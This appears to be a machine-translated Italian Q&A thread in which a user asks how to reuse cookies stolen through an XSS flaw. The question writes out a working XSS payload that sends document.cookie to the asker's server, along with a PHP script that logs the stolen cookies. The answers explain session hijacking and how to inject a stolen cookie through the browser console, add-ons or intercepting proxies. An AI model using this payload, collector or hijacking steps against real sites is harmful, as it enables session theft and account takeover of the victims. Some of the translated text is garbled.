Utilizza i cookie una volta rubati

5

Ho visto molti post sul furto di cookie, infatti ho approfittato della vulnerabilità XSS per inviare il cookie al mio php attraverso una variabile nell'URL a un php, e che php scrive il cookie in un file. (Penso che sia uno dei processi normali).

Ti dirò come renderlo più chiaro:
Quello che scrivo nel modulo:

<script>location.href = 'http://myserverIP/test/signup.php?cookie='+document.cookie;</script>

Il mio php:

$cookie = $_GET['cookie'];

//open the file and choose the mode
$fh = fopen("users", "a");
fwrite($fh, $cookie);

//close the file
fclose($fh);

print "User Submitted: ";
print ($cookie);

Tutto bene finora, ma ora, nel computer ho il cookie, come posso accedere al sito web.

Se potessi sapere come posso approfittare di conoscere i cookie, mi farebbe piacere apprezzare.

    
posta aDoN 21.10.2014 - 09:45
fonte

4 risposte

5

AFAIK, l'uso di cookie rubati dipende dal browser che stai utilizzando.
Ad esempio firefox memorizza i cookie in un file non-plain-text cookies.sqlite in cui non puoi semplicemente copiare / incollare la chiave / il valore del cookie.
Firebug ti dà la possibilità di aggiungere / modificare i cookie per il sito web di destinazione.

    
risposta data 21.10.2014 - 10:54
fonte
7

...php writes the cookie into a file. (I think that is one of the normal processes).

Da quanto hai scritto sopra, sembra che ci possa essere un equivoco sulla tua comprensione di come una sessione viene creata e gestita su un sito web. Quando un utente accede a un sito Web, viene generato un ID di sessione e questo ID è memorizzato in un cookie speciale, noto come cookie di sessione, sul browser del client, in questo modo:

PHPSESSID:fgws4j52jcm10dkgw02nd2

Allo stesso tempo, viene creato un file di sessione (o una riga di database) con lo stesso id contenente variabili (come nome utente, tempo di accesso) relative a quel particolare utente. Queste variabili di sessione vengono memorizzate sul lato server e richiamate dall'array superglobal $_SESSION all'avvio di una sessione.

Per dirottare una sessione, quello di cui hai bisogno è un cookie contenente la coppia nome-valore come quella sopra. Una precondizione è che la vittima deve essere registrata durante l'attacco in modo tale che il file di sessione con l'id rubato sia ancora fresco sul server. Inoltre, il sito Web non deve eseguire altri controlli estranei (come user agent o indirizzo IP) per contrastare i dirottatori.

<script>location.href = 'http://myserverIP/test/signup.php?cookie='+document.cookie;</script>

Il javascript che hai scritto sopra inietta semplicemente una coppia nome-valore nella matrice superglobale $_GET . Quello che vuoi è trasmettere la coppia nome-valore usando il tuo cookie del browser, certamente non con l'URL.

La maggior parte dei browser moderni memorizza le informazioni sui cookie in un database come sqlite. Per modificare un cookie, è necessario accedere alla console Web o alla barra degli strumenti dello sviluppatore che è coperta qui per Chrome e here per Firefox .

    
risposta data 21.10.2014 - 12:51
fonte
4

È possibile utilizzare JavaScript per impostare il cookie nel browser:

document.cookie =
 'cookie1=test; expires=Fri, 3 Aug 2022 20:47:11 UTC; path=/'

Basta aprire una console premendo F12 o posizionare il codice JavaScript in una pagina Web.

Vedi link

    
risposta data 21.10.2014 - 12:43
fonte
1

Ci sono diversi modi per farlo davvero, tutto si riduce alla stessa cosa:

  • Di solito, il tuo browser dovrebbe consentire di modificare il valore del cookie memorizzato, basta sostituire il valore corrente con quello che hai rubato
  • Ci sono numerosi componenti aggiuntivi del browser e amp; plug-in che ti consentono di manomettere la tua richiesta prima di inviarla, puoi aggiungere o modificare il valore del tuo cookie qui
  • Puoi implementare un proxy locale come Fiddler o Burp per fare fondamentalmente la stessa cosa e amp; manomettere la richiesta prima di inviarla
risposta data 21.10.2014 - 11:23
fonte

Leggi altre domande sui tag